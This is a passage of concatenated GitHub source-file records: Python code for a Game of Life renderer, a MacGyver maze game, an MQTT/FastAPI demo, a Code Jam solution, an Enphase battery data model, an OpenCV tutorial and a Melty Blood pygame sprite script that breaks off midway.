self.SetSize((500, 500))\n\n self.speed_slider.SetValue(100)\n self._on_slider_changed(None)\n\n def _on_slider_changed(self, evt):\n new_value = self.speed_slider.GetValue()\n self.speed_value.SetLabel(str(new_value))\n wx.PostEvent(self, evt_speed_changed(new_speed=new_value))\n\n\nclass Cell(object):\n def __init__(self, x, y, color=None):\n if color is None:\n color = wx.Colour(0, 0, 0)\n\n self.color = color\n self.x = x\n self.y = y\n\n\nclass GridCtrl(wx.Panel):\n def __init__(self, parent, board, show_lines=True):\n super(GridCtrl, self).__init__(parent)\n\n self._board = board\n self._width = board.width\n self._height = board.height\n self._show_lines = show_lines\n self._canvas_w = 0\n self._canvas_h = 0\n self._cell_width = 0\n self._cell_height = 0\n\n self._cell_brush = wx.Brush(\"grey\", wx.SOLID)\n\n self._cells = []\n\n self._cells.append(Cell(3, 2))\n\n self.Bind(wx.EVT_PAINT, self._on_paint)\n\n def _on_paint(self, evt):\n dc = wx.PaintDC(self)\n dc.Clear()\n self._canvas_w, self._canvas_h = self.GetSize()\n self._cell_width = self._canvas_w / self._width\n self._cell_height = self._canvas_h / self._height\n\n if self._show_lines:\n self._draw_grid_lines(dc)\n\n self._draw_cells(dc)\n\n def _draw_grid_lines(self, dc):\n dc.DrawLine(0, 0, self._canvas_w, 0)\n dc.DrawLine(0, 0, 0, self._canvas_h)\n dc.DrawLine(self._canvas_w, 0, self._canvas_w, self._canvas_h)\n dc.DrawLine(0, self._canvas_h, self._canvas_w, self._canvas_h)\n\n for y in range(0, self._height):\n dc.DrawLine(0, y * self._cell_height, self._canvas_w, y * self._cell_height)\n\n for x in range(0, self._width):\n dc.DrawLine(x * self._cell_width, 0, x * self._cell_width, self._canvas_w)\n\n def _draw_cells(self, dc):\n dc.SetBrush(self._cell_brush)\n for cell in self._board:\n if cell.is_alive:\n self._draw_cell(cell, dc)\n\n def _draw_cell(self, cell, dc):\n dc.DrawRectangle(cell.pos.x * self._cell_width,\n cell.pos.y * self._cell_height,\n self._cell_width + 1,\n self._cell_height + 1)\n\n\nif __name__ == \"__main__\":\n app = WxRenderer()\n app.MainLoop()\n","repo_name":"menacingChicken/game_of_life","sub_path":"gol/wx_renderer.py","file_name":"wx_renderer.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71529693634","text":"# Class\n\nimport pygame\nfrom pygame.locals import *\nfrom constantesM import *\nimport random\n\n\n# This class create the level\nclass Level:\n def __init__(self, file):\n self.file = file\n # Very important /!\\ THE ARRAY MUST BE EMPTY /!\\\n self.structure = []\n\n # Method that generate the level from the levelGame.txt\n def gen(self):\n # Open the file\n with open(self.file, \"r\") as file:\n structure_level = []\n # Reading the lines in file\n for line in file:\n line_of_level = []\n # Reading every letters in file\n for sprite in line:\n # Ignoring the last sprite to continue with the next line\n if sprite != '\\n':\n # Adding every letters to the array\n line_of_level.append(sprite)\n # Adding every lines the the array\n structure_level.append(line_of_level)\n # Then the method save the entire structure of the level\n self.structure = structure_level\n\n # This method display the level into the window\n def Show(self, Window):\n\n # Load the img of the structure of the level\n Wall = pygame.image.load(\"images/mur.png\").convert()\n Escape = pygame.image.load(garde).convert_alpha()\n\n # Read the entire structure\n num_ligne = 0\n for line in self.structure:\n # Read every line\n num_case = 0\n for sprite in line:\n # Calculate the real position of the sprite\n x = num_case * w_sprite\n y = num_ligne * w_sprite\n if sprite == 'm': # m = Wall\n Window.blit(Wall, (x, y))\n elif sprite == \"a\": # a = Exit of the maze\n Window.blit(Escape, (x, y))\n num_case += 1\n num_ligne += 1\n\n\n# That class create the character\nclass MacGyver:\n\n def __init__(self, right, left, up, down, level):\n\n # Sprites of the character (need to get improve)\n self.right = pygame.image.load(right).convert_alpha()\n self.left = pygame.image.load(left).convert_alpha()\n self.up = pygame.image.load(up).convert_alpha()\n self.down = pygame.image.load(down).convert_alpha()\n\n # Initial position of the character\n self.case_x = 0\n self.case_y = 0\n self.x = 0\n self.y = 0\n\n # Initial position of Mac Gyver. Need to be improve with the sprite\n self.direction = self.right\n self.level = level\n\n # This method allow the player to move Mac Gyver\n def move(self, direction):\n\n # Move to the right\n if direction == 'right':\n # To not get out of the window\n if self.case_x < (nsc - 1):\n # Check if the next iteration isn't a wall\n if self.level.structure[self.case_y][self.case_x + 1] != 'm':\n # Move 1 square\n self.case_x += 1\n # Calculate the real position\n self.x = self.case_x * w_sprite\n # Display the right sprite in fonction of movement\n self.direction = self.right\n\n # Move to the left\n if direction == 'left':\n if self.case_x > 0:\n if self.level.structure[self.case_y][self.case_x - 1] != 'm':\n self.case_x -= 1\n self.x = self.case_x * w_sprite\n self.direction = self.left\n\n # Move to the top\n if direction == 'up':\n if self.case_y > 0:\n if self.level.structure[self.case_y - 1][self.case_x] != 'm':\n self.case_y -= 1\n self.y = self.case_y * w_sprite\n self.direction = self.up\n\n # Move to the bottom\n if direction == 'down':\n if self.case_y < (nsc - 1):\n if self.level.structure[self.case_y + 1][self.case_x] != 'm':\n self.case_y += 1\n self.y = self.case_y * w_sprite\n self.direction = self.down\n\n\n# Class to create one of the items\nclass Ether:\n\n def __init__(self, obj, level):\n\n # Load the sprite of the item\n self.obj = pygame.image.load(obj).convert_alpha\n\n # Initial settings for the item\n self.level = level\n self.case_x, self.case_y = self.randpos()\n self.x = self.case_x * w_sprite\n self.y = self.case_y * w_sprite\n\n # Method that calculate a random pos to pop the item\n def randpos(self):\n count_max = 1\n count = 0\n\n # A loop to check of the position picked by random is a freespace\n while count < count_max:\n self.case_x = random.randint(0, 14)\n self.case_y = random.randint(0, 14)\n\n # If the sprite is a freespace\n if self.level.structure[self.case_y][self.case_x] == '0':\n\n # then change it to a mark where the program gonna pop the item.\n self.level.structure[self.case_y][self.case_x] = \"o1\"\n\n # And quit the loop\n count += 1\n break\n return self.case_x, self.case_y\n\n # Method that display the item on the map\n def display(self, Window):\n\n # Load the sprite\n c_ether = pygame.image.load(\"images/ether.png\").convert_alpha()\n\n # Display the item on screen\n Window.blit(c_ether, (self.x, self.y))\n\n\n# Class to create one of the items\nclass Needle:\n def __init__(self, obj, level):\n self.obj = pygame.image.load(obj).convert_alpha\n self.level = level\n self.case_x, self.case_y = self.randpos()\n self.x = self.case_x * w_sprite\n self.y = self.case_y * w_sprite\n\n def randpos(self):\n count_max = 1\n count = 0\n while count < count_max:\n self.case_x = random.randint(0,14)\n self.case_y = random.randint(0,14)\n if self.level.structure[self.case_y][self.case_x] == '0':\n self.level.structure[self.case_y][self.case_x] = \"o2\"\n count += 1\n break\n return self.case_x, self.case_y\n\n def display(self, Window):\n c_needle = pygame.image.load(\"images/needle.png\").convert_alpha()\n Window.blit(c_needle, (self.x, self.y))\n\n\n# Class to create one of the items\nclass Tube:\n def __init__(self, obj, level):\n self.obj = pygame.image.load(obj).convert_alpha\n self.level = level\n self.case_x, self.case_y = self.randpos()\n self.x = self.case_x * w_sprite\n self.y = self.case_y * w_sprite\n\n def randpos(self):\n count_max = 1\n count = 0\n while count < count_max:\n self.case_x = random.randint(0,14)\n self.case_y = random.randint(0,14)\n if self.level.structure[self.case_y][self.case_x] == '0':\n self.level.structure[self.case_y][self.case_x] = \"o3\"\n count += 1\n break\n return self.case_x, self.case_y\n\n def display(self, Window):\n c_tube = pygame.image.load(\"images/tube.png\").convert_alpha()\n Window.blit(c_tube, (self.x, self.y))\n","repo_name":"Nexus-Strife/MacGyver","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":7245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6532932969","text":"import os\n\nfrom fastapi import FastAPI\nfrom fastapi_mqtt import FastMQTT, MQTTConfig\nimport uvicorn\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom log_config import get_logger\n\nlogger = get_logger()\n\nMQTT_HOST = os.getenv(\"MQTT_HOST\", \"localhost\")\nMQTT_PORT = int(os.getenv(\"MQTT_PORT\", 1883))\nlogger.info(f\"MQTT_HOST: {MQTT_HOST}\")\nlogger.info(f\"MQTT_PORT: {MQTT_PORT}\")\n\nMQTT_GROUP = os.getenv(\"MQTT_GROUP\", \"group1\")\nMQTT_TOPIC = os.getenv(\"MQTT_TOPIC\", \"test\")\nSUBSCRIBE_TOPIC = f\"$share/{MQTT_GROUP}/{MQTT_TOPIC}\"\nlogger.info(f\"MQTT_GROUP: {MQTT_GROUP}, MQTT_TOPIC: {MQTT_TOPIC}\")\nlogger.info(f\"SUBSCRIBE_TOPIC: {SUBSCRIBE_TOPIC}\")\n\n# MQTT config\nmqtt_config = MQTTConfig(\n host=MQTT_HOST,\n port=MQTT_PORT\n)\n\nmqtt = FastMQTT(\n config=mqtt_config\n)\n\napp = FastAPI()\nmqtt.init_app(app)\n\n\ndef tick():\n logger.info(\"tick\")\n mqtt.publish(MQTT_TOPIC, 'tick')\n\n\n@app.on_event('startup')\nasync def init_data():\n logger.info(\"Starting the scheduler\")\n scheduler = BackgroundScheduler()\n scheduler.add_job(tick, 'interval', seconds=10)\n scheduler.start()\n\n\n@mqtt.on_connect()\ndef connect(client, flags, rc, properties):\n logger.info(\"Connected to MQTT Broker!\")\n mqtt.client.subscribe(SUBSCRIBE_TOPIC) # subscribing mqtt topic\n logger.info(f\"Connected: {client}, {flags}, {rc}, {properties}\")\n\n\n@mqtt.on_message()\nasync def message(client, topic, payload, qos, properties):\n logger.info(f\"Received message ({os.getpid()}): {topic}, {payload.decode()}, {qos}, {properties}\")\n\n\n@mqtt.subscribe(\"dupa\")\nasync def message_to_topic(client, topic, payload, qos, properties):\n logger.info(\"Received message to specific topic: \", topic, payload.decode(), qos, properties)\n\n\n@mqtt.on_disconnect()\ndef disconnect(client, packet, exc=None):\n logger.info(\"Disconnected\")\n\n\n@mqtt.on_subscribe()\ndef subscribe(client, mid, qos, properties):\n logger.info(f\"subscribed {client}, {mid}, {qos}, {properties}\")\n\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello World\"}\n\n\n@app.get(\"/publish\")\nasync def func(message: str = \"Test message.\"):\n logger.info(f\"Publishing message ({os.getpid()}): {message}\")\n mqtt.publish(MQTT_TOPIC, message)\n\n return {\"result\": True, \"message\": \"Published\"}\n\n\nif __name__ == \"__main__\":\n logger.info(\"Starting server from main.py\")\n port = int(os.getenv(\"PORT\", 8080))\n uvicorn.run(app, host='0.0.0.0', port=port)\n","repo_name":"karol-brejna-i/mqtt-shared-subscription","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23562994781","text":"\n# coding: utf-8\n\n# In[37]:\n\ndef isTidy(N):\n if(N < 9):\n return True\n #get unit and tenth place\n unitPlace = N % 10\n tenthPlace = (N // 10) % 10\n if(tenthPlace > unitPlace):\n return False\n else:\n return isTidy(N // 10)\n \ndef tidyNumber(N):\n n = N\n while n >= 0:\n if isTidy(n):\n return n\n n = n -1\n\nf = open('./data/B-small-attempt1.in')\nfOut = open('./data/B-small-attempt1.out',\"w+\")\nt = f.readline()\nprint(t)\nt = int(t)\nfor i in range(t + 1):\n num = f.readline()\n try:\n num = int(num)\n fOut.write('Case #' + str((i + 1)) + \":\" + str(tidyNumber(num)) + \"\\n\")\n except:\n pass\nf.close()\nfOut.close()\n\n\n# In[ ]:\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/4911.py","file_name":"4911.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1218950882","text":"\"\"\"Model for the Encharge/IQ Battery.\"\"\"\n# Data Source: URL_ENSEMBLE_INVENTORY (primary) & URL_ENCHARGE_BATTERY\n\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom typing import Any\n\n\n@dataclass(slots=True)\nclass EnvoyEnchargeAggregate:\n \"\"\"Model for Encharge aggregate data.\"\"\"\n\n available_energy: int\n backup_reserve: int\n state_of_charge: int\n reserve_state_of_charge: int\n configured_reserve_state_of_charge: int\n max_available_capacity: int\n\n @classmethod\n def from_api(cls, data: dict[str, Any]) -> EnvoyEnchargeAggregate:\n \"\"\"Initialize from the API.\"\"\"\n return cls(\n available_energy=data[\"ENC_agg_avail_energy\"],\n backup_reserve=data[\"ENC_agg_backup_energy\"],\n state_of_charge=data[\"ENC_agg_soc\"],\n reserve_state_of_charge=data[\"adjusted_backup_soc\"],\n configured_reserve_state_of_charge=data[\"configured_backup_soc\"],\n max_available_capacity=data[\"Enc_max_available_capacity\"],\n )\n\n\n@dataclass(slots=True)\nclass EnvoyEnchargePower:\n \"\"\"Model for the Encharge/IQ battery power.\"\"\"\n\n apparent_power_mva: int\n real_power_mw: int\n soc: int\n\n @classmethod\n def from_api(cls, power: dict[str, Any]) -> EnvoyEnchargePower:\n \"\"\"Initialize from the API.\"\"\"\n return cls(\n apparent_power_mva=power[\"apparent_power_mva\"],\n real_power_mw=power[\"real_power_mw\"],\n soc=power[\"soc\"],\n )\n\n\n@dataclass(slots=True)\nclass EnvoyEncharge:\n \"\"\"Model for the Encharge/IQ battery.\"\"\"\n\n admin_state: int\n admin_state_str: str\n bmu_firmware_version: str\n comm_level_2_4_ghz: int\n comm_level_sub_ghz: int\n communicating: bool\n dc_switch_off: bool\n encharge_capacity: int\n encharge_revision: int\n firmware_loaded_date: int\n firmware_version: str\n installed_date: int\n last_report_date: int\n led_status: int\n max_cell_temp: int\n operating: bool | None\n part_number: str\n percent_full: int\n serial_number: str\n temperature: int\n temperature_unit: str\n zigbee_dongle_fw_version: str | None\n\n @classmethod\n def from_api(cls, inventory: dict[str, Any]) -> EnvoyEncharge:\n \"\"\"Initialize from the API.\"\"\"\n return cls(\n admin_state=inventory[\"admin_state\"],\n admin_state_str=inventory[\"admin_state_str\"],\n bmu_firmware_version=inventory[\"bmu_fw_version\"],\n comm_level_2_4_ghz=inventory[\"comm_level_2_4_ghz\"],\n comm_level_sub_ghz=inventory[\"comm_level_sub_ghz\"],\n communicating=inventory[\"communicating\"],\n dc_switch_off=inventory[\"dc_switch_off\"],\n encharge_capacity=inventory[\"encharge_capacity\"],\n encharge_revision=inventory[\"encharge_rev\"],\n firmware_loaded_date=inventory[\"img_load_date\"],\n firmware_version=inventory[\"img_pnum_running\"],\n installed_date=inventory[\"installed\"],\n last_report_date=inventory[\"last_rpt_date\"],\n led_status=inventory[\"led_status\"],\n max_cell_temp=inventory[\"maxCellTemp\"],\n operating=inventory.get(\"operating\"), # Firmware 8+ does not have this key\n part_number=inventory[\"part_num\"],\n percent_full=inventory[\"percentFull\"],\n serial_number=inventory[\"serial_num\"],\n temperature=inventory[\"temperature\"],\n temperature_unit=\"C\",\n zigbee_dongle_fw_version=inventory.get(\n \"zigbee_dongle_fw_version\"\n ), # Firmware 8+ does not have this key\n )\n","repo_name":"pyenphase/pyenphase","sub_path":"src/pyenphase/models/encharge.py","file_name":"encharge.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"38971053855","text":"import cv2\nimport numpy as np\n\n\n\n\n#######################################################################################################################\n#INTRODUCTION TO OpenCV\n#######################################################################################################################\n\n# Read image\nimage = cv2.imread(\"./images/lena.jpeg\")\n\n# Image properties\nprint(\"Type of image: \",type(image))\nprint(\"Data type of image: \",image.dtype) # why uint8 ?-> https://docs.opencv.org/2.4/modules/highgui/doc/user_interface.html#imshow\n\n\nprint(image.shape)\nprint(image.shape[1])\nprint(image.shape[2])\nprint(image.shape[3])\n\n\n# Reach to Pixel Vectors\nb,g,r = cv2.split(image)\n\nb = image[:,:,0]\ng = image[:,:,1]\nr = image[:,:,2]\n\n\n'''\nThe gray color tone has a special case because a gray color image is stored in two dimensions. function to upload images \n'cv2.imread()' By default, it loads 3D, but there is no need to do anything while uploading gray images. Additionally, \nit is possible to make a loaded color image gray, even tints can be made in different color spaces, not just gray.\n'''\n\n# Conversion to grayscale\nprint(\"Original image shape: \",image.shape)\ngray_image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\nprint(\"Grayscale image shape: \",gray_image.shape)\ngray_image = cv2.imread(\"./images/rgb_image.jpeg\",cv2.IMREAD_GRAYSCALE)\n\n\n# Image Visualization\ncv2.imshow(\"blue channel\",b)\ncv2.imshow(\"image\",image)\ncv2.imshow(\"gray image\",gray_image)\ncv2.waitKey(0)\n\n\n\n\n#######################################################################################################################\n# MANIPULATING PIXEL VALUES (Accessing and changing pixels of an image)\n#######################################################################################################################\n\n# Let's create a picture ourselves\nimg = np.zeros(shape=(500,500,3),dtype=np.uint8)\n\ncv2.imshow(\"img\",img)\ncv2.waitKey(0)\n\n# Change the hue of the pixel\nimg[50,50] = (255,0,0) #just change blue channel\nimg[450,250] = (255,255,255)\n\ncv2.imshow(\"img\",img)\ncv2.waitKey(0)\n\nimg_grayscale = np.full(shape=(500,500),fill_value=255,dtype=np.uint8)\nimg_grayscale[50,50] = 0\n\n\ncv2.imshow(\"Grayscale\",img_grayscale)\ncv2.waitKey(0)\n\n\n\n\n#######################################################################################################################\n# READING VIDEO WITH THE OpenCV\n#######################################################################################################################\n\ncap = cv2.VideoCapture(\"./images/spot.mp4\")\n\nwhile True:\n ret,frame = cap.read()\n\n # frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY) # if you want to make it gray\n\n cv2.imshow(\"video\",frame)\n key = cv2.waitKey(30)\n if key == ord('q'):\n break\n\ncap.release() #'Deletes the cap variable so that it does not take up more space in memory'\ncv2.destroyAllWindows() #'destroys the open window'\n\n\n\n\n#######################################################################################################################\n# Resizing the image\n#######################################################################################################################\n\n\"\"\"\nTypes of interpolation in OpenCV:\n\n- INTER_NEAREST - a nearest-neighbor interpolation\n- INTER_LINEAR - a bilinear interpolation (used by default)\n- INTER_AREA - Resampling using pixel area relation. It may be a preferred method for image decimation. \n But when the image is zoomed, it is similar to the INTER_NEAREST method. \n- INTER_CUBIC - a bicubic interpolation over 4x4 pixel neighborhood\n- INTER_LANCZOS4 - a Lanczos interpolation over 8x8 pixel neighborhood\n\n\"\"\"\n\nimg = cv2.imread(\"./images/lena.jpeg\")\nprint(\"Original image shape: \",img.shape)\n\nnew_img = cv2.resize(img,dsize=(200,200),interpolation=cv2.INTER_LINEAR) # interpolation\nprint(\"Shape after resizing: \",img.shape)\n\n'''\nAttention! , the first value of img.shape gives the height of the image \nbut the first value written in resize() is the width in the new resize.\n'''\n\ncv2.imshow(\"Img\",img)\ncv2.imshow(\"New img\",new_img)\ncv2.waitKey(0)\n\n\n\n\n#######################################################################################################################\n# ADDING DIFFERENT SHAPES AND TEXTS TO THE PICTURE\n#######################################################################################################################\n\nblank = np.zeros((500,500,3),dtype=np.uint8)\ncv2.imshow('Blank',blank)\n\n# point image a certain color\nblank[0:100,0:100] = 0,255,0 # Paint an area 100x100\n\n# draw rectangle\ncv2.rectangle(blank,(50,50),(100,100),(0,0,255),1) # trt with thickness=-1\n\n# draw circle\ncv2.circle(blank,(255,250),50,(0,0,255),1)\n\n# draw line\ncv2.line(blank,(0,0),(300,300),(0,0,255),2)\n\n# put text\ncv2.putText(blank,'ESTU',(70,70),cv2.FONT_HERSHEY_PLAIN,1,(0,0,255),1)\n\n\ncv2.imshow(\"Green\",blank)\ncv2.waitKey(0)\n\n\n\n\n#######################################################################################################################\n# THRESHOLD\n#######################################################################################################################\n\n'It is the process of dyeing values higher or lower than a specified threshold value into different colors.'\n\n\n'Check here for more information.'\n# https://docs.opencv.org/3.4/db/d8e/tutorial_threshold.html\n\n\nimg = cv2.imread(\"./images/coins.jpg\")\ncv2.imshow(\"img\",img)\n\n#It is useful to make the picture gray before applying.\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"gray\",gray)\n\n\n# simple thresholding\nthreshold,thresh = cv2.threshold(gray,150,255,cv2.THRESH_BINARY)\nthreshold,thresh_inv = cv2.threshold(gray,150,255,cv2.THRESH_BINARY_INV)\n\ncv2.imshow(\"thresh invert\",thresh_inv)\ncv2.imshow(\"thresh\",thresh)\ncv2.waitKey(0)\n\n\n\n\n#######################################################################################################################\n# Why we use hsv color space?\n#######################################################################################################################\n\nimg = cv2.imread(\"./images/red_car.jpg\")\nhsv_img = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\nlower1 = np.array([161, 155, 84])\nupper1 = np.array([179, 255, 255])\n\nlower2 = np.array([0,50,50])\nupper2 = np.array([10,255,255])\n\nred_mask1 = cv2.inRange(hsv_img, lower1, upper1)\nred_mask2 = cv2.inRange(hsv_img,lower2,upper2)\n\nred_mask = red_mask1 + red_mask2\nred = cv2.bitwise_and(img, img, mask=red_mask)\n\ncv2.imshow(\"red_mask\",red_mask)\ncv2.imshow(\"red\",red)\ncv2.imshow(\"bgr\",img)\ncv2.imshow(\"hsv\",hsv_img)\ncv2.waitKey(0)\n","repo_name":"mazlumdc/OpenCV","sub_path":"OpenCV/OpenCV.py","file_name":"OpenCV.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23790746259","text":"import pygame\nfrom pygame import time as pytime\nfrom pygame.locals import *\nimport time\nimport sys\n\nscreen_w = 640\nscreen_h = 480\n\ndef main():\n pygame.mixer.init()\n pygame.mixer.music.load(\"melty_blood_song.mp3\")\n pygame.mixer.music.play(-1)\n\n pygame.init()# este comando inicia la aplicacion \n screen = pygame.display.set_mode((screen_w, screen_h),FULLSCREEN) # comando para desplegar fondo\n pygame.display.set_caption(\"Melty Blood 2.0\") # comando para desplegar mensaje en la ventana\n \n fondo = pygame.image.load(\"stage.jpg\").convert()\n x = 80\n y = 20\n i = 8\n v = 0 # frames animacion\n u = 0 # frames agacharse, saltar, golpear\n time = 100 # stand by\n time_2 = 70 # movimiento\n time_3 = 35 # agacharse\n time_4 = 0 # espera de agacharse\n estado = 0\n pos = 0\n final_1 = 85\n final_2 = 10\n \n Akiha_00 = {} # stand by derecha \n Akiha_00[0]=(\"aki00_000.png\")\n Akiha_00[1]=(\"aki00_001.png\")\n Akiha_00[2]=(\"aki00_002.png\")\n Akiha_00[3]=(\"aki00_003.png\")\n Akiha_00[4]=(\"aki00_004.png\")\n Akiha_00[5]=(\"aki00_005.png\")\n Akiha_00[6]=(\"aki00_006.png\")\n Akiha_00[7]=(\"aki00_007.png\")\n Akiha_00[8]=(\"aki00_008.png\")\n Akiha_00[9]=(\"aki00_009.png\")\n Akiha_00[10]=(\"aki00_010.png\")\n Akiha_00[11]=(\"aki00_011.png\")\n\n Akihar_00 = {} # stand by izquierda\n Akihar_00[0]=(\"aki00r_000.png\")\n Akihar_00[1]=(\"aki00r_001.png\")\n Akihar_00[2]=(\"aki00r_002.png\")\n Akihar_00[3]=(\"aki00r_003.png\")\n Akihar_00[4]=(\"aki00r_004.png\")\n Akihar_00[5]=(\"aki00r_005.png\")\n Akihar_00[6]=(\"aki00r_006.png\")\n Akihar_00[7]=(\"aki00r_007.png\")\n Akihar_00[8]=(\"aki00r_008.png\")\n Akihar_00[9]=(\"aki00r_009.png\")\n Akihar_00[10]=(\"aki00r_010.png\")\n Akihar_00[11]=(\"aki00r_011.png\")\n \n Akiha_01 = {} # animacion caminar derecha\n Akiha_01[0]=(\"aki26_000.png\")\n Akiha_01[1]=(\"aki26_001.png\")\n Akiha_01[2]=(\"aki26_002.png\")\n Akiha_01[3]=(\"aki26_003.png\")\n Akiha_01[4]=(\"aki26_004.png\")\n Akiha_01[5]=(\"aki26_005.png\")\n Akiha_01[6]=(\"aki26_006.png\")\n Akiha_01[7]=(\"aki26_007.png\")\n Akiha_01[8]=(\"aki26_008.png\")\n Akiha_01[9]=(\"aki26_009.png\")\n Akiha_01[10]=(\"aki26_010.png\")\n Akiha_01[11]=(\"aki26_010.png\")\n Akiha_01[12]=(\"aki26_011.png\")\n Akiha_01[13]=(\"aki26_012.png\")\n\n Akihar_01 = {} # animacion caminar izquierda\n Akihar_01[0]=(\"aki26r_000.png\")\n Akihar_01[1]=(\"aki26r_001.png\")\n Akihar_01[2]=(\"aki26r_002.png\")\n Akihar_01[3]=(\"aki26r_003.png\")\n Akihar_01[4]=(\"aki26r_004.png\")\n Akihar_01[5]=(\"aki26r_005.png\")\n Akihar_01[6]=(\"aki26r_006.png\")\n Akihar_01[7]=(\"aki26r_007.png\")\n Akihar_01[8]=(\"aki26r_008.png\")\n Akihar_01[9]=(\"aki26r_009.png\")\n Akihar_01[10]=(\"aki26r_010.png\")\n Akihar_01[11]=(\"aki26r_010.png\")\n Akihar_01[12]=(\"aki26r_011.png\")\n Akihar_01[13]=(\"aki26r_012.png\")\n\n Akiha_02 = {} # animacion abajo derecha\n Akiha_02[0]=(\"aki28_000.png\")\n Akiha_02[1]=(\"aki28_001.png\")\n Akiha_02[2]=(\"aki28_002.png\")\n Akiha_02[3]=(\"aki28_003.png\")\n Akiha_02[4]=(\"aki28_004.png\")\n Akiha_02[5]=(\"aki28_005.png\")\n Akiha_02[6]=(\"aki28_006.png\")\n Akiha_02[7]=(\"aki28_007.png\")\n Akiha_02[8]=(\"aki28_008.png\")\n Akiha_02[9]=(\"aki28_009.png\")\n Akiha_02[10]=(\"aki28_010.png\")\n Akiha_02[11]=(\"aki28_011.png\")\n Akiha_02[12]=(\"aki28_012.png\")\n Akiha_02[13]=(\"aki28_013.png\")\n\n Akihar_02 = {} # animacion abajo derecha\n Akihar_02[0]=(\"aki28r_000.png\")\n Akihar_02[1]=(\"aki28r_001.png\")\n Akihar_02[2]=(\"aki28r_002.png\")\n Akihar_02[3]=(\"aki28r_003.png\")\n Akihar_02[4]=(\"aki28r_004.png\")\n Akihar_02[5]=(\"aki28r_005.png\")\n Akihar_02[6]=(\"aki28r_006.png\")\n Akihar_02[7]=(\"aki28r_007.png\")\n Akihar_02[8]=(\"aki28r_008.png\")\n Akihar_02[9]=(\"aki28r_009.png\")\n Akihar_02[10]=(\"aki28r_010.png\")\n Akihar_02[11]=(\"aki28r_011.png\")\n Akihar_02[12]=(\"aki28r_012.png\")\n Akihar_02[13]=(\"aki28r_013.png\")\n\n Akiha_03 = {} # animacion hacia arriba derecha\n Akiha_03[0]=(\"aki17_000.png\")\n Akiha_03[1]=(\"aki17_001.png\")\n Akiha_03[2]=(\"aki17_002.png\")\n Akiha_03[3]=(\"aki17_003.png\")\n Akiha_03[4]=(\"aki17_004.png\")\n Akiha_03[5]=(\"aki17_005.png\")\n Akiha_03[6]=(\"aki17_006.png\")\n Akiha_03[7]=(\"aki17_007.png\")\n Akiha_03[8]=(\"aki17_008.png\")\n Akiha_03[9]=(\"aki17_009.png\")\n Akiha_03[10]=(\"aki17_010.png\")\n Akiha_03[11]=(\"aki17_011.png\")\n Akiha_03[12]=(\"aki17_012.png\")\n Akiha_03[13]=(\"aki17_013.png\")\n Akiha_03[14]=(\"aki17_014.png\")\n Akiha_03[15]=(\"aki17_015.png\")\n Akiha_03[16]=(\"aki17_016.png\")\n Akiha_03[17]=(\"aki17_017.png\")\n Akiha_03[18]=(\"aki17_018.png\")\n Akiha_03[19]=(\"aki17_019.png\")\n Akiha_03[20]=(\"aki17_020.png\")\n Akiha_03[21]=(\"aki17_021.png\")\n Akiha_03[22]=(\"aki17_022.png\")\n Akiha_03[23]=(\"aki17_023.png\")\n Akiha_03[24]=(\"aki17_024.png\")\n Akiha_03[25]=(\"aki17_025.png\")\n Akiha_03[26]=(\"aki17_026.png\")\n Akiha_03[27]=(\"aki17_027.png\")\n\n Akihar_03 = {} # animacion hacia arriba izquierda\n Akihar_03[0]=(\"aki17r_000.png\")\n Akihar_03[1]=(\"aki17r_001.png\")\n Akihar_03[2]=(\"aki17r_002.png\")\n Akihar_03[3]=(\"aki17r_003.png\")\n Akihar_03[4]=(\"aki17r_004.png\")\n Akihar_03[5]=(\"aki17r_005.png\")\n Akihar_03[6]=(\"aki17r_006.png\")\n Akihar_03[7]=(\"aki17r_007.png\")\n Akihar_03[8]=(\"aki17r_008.png\")\n Akihar_03[9]=(\"aki17r_009.png\")\n Akihar_03[10]=(\"aki17r_010.png\")\n Akihar_03[11]=(\"aki17r_011.png\")\n Akihar_03[12]=(\"aki17r_012.png\")\n Akihar_03[13]=(\"aki17r_013.png\")\n Akihar_03[14]=(\"aki17r_014.png\")\n Akihar_03[15]=(\"aki17r_015.png\")\n Akihar_03[16]=(\"aki17r_016.png\")\n Akihar_03[17]=(\"aki17r_017.png\")\n Akihar_03[18]=(\"aki17r_018.png\")\n Akihar_03[19]=(\"aki17r_019.png\")\n Akihar_03[20]=(\"aki17r_020.png\")\n Akihar_03[21]=(\"aki17r_021.png\")\n Akihar_03[22]=(\"aki17r_022.png\")\n Akihar_03[23]=(\"aki17r_023.png\")\n Akihar_03[24]=(\"aki17r_024.png\")\n Akihar_03[25]=(\"aki17r_025.png\")\n Akihar_03[26]=(\"aki17r_026.png\")\n Akihar_03[27]=(\"aki17r_027.png\")\n\n Akiha_04 = {} # light punch derecha\n Akiha_04[0]=(\"aki01_000.png\")\n Akiha_04[1]=(\"aki01_001.png\")\n Akiha_04[2]=(\"aki01_002.png\")\n Akiha_04[3]=(\"aki01_003.png\")\n Akiha_04[4]=(\"aki01_004.png\")\n Akiha_04[5]=(\"aki01_005.png\")\n \n Akihar_04 = {} # light punch izquierda\n Akihar_04[0]=(\"aki01r_000.png\")\n Akihar_04[1]=(\"aki01r_001.png\")\n Akihar_04[2]=(\"aki01r_002.png\")\n Akihar_04[3]=(\"aki01r_003.png\")\n 